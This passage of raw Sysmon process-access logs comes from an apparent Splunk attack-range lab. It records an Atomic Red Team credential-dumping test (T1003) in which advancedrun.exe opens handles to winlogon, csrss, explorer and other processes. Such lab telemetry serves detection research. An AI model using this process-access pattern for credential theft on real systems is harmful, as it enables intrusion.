eam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943870Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943869Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943867Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003943866Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943865Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943864Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943860Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943858Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
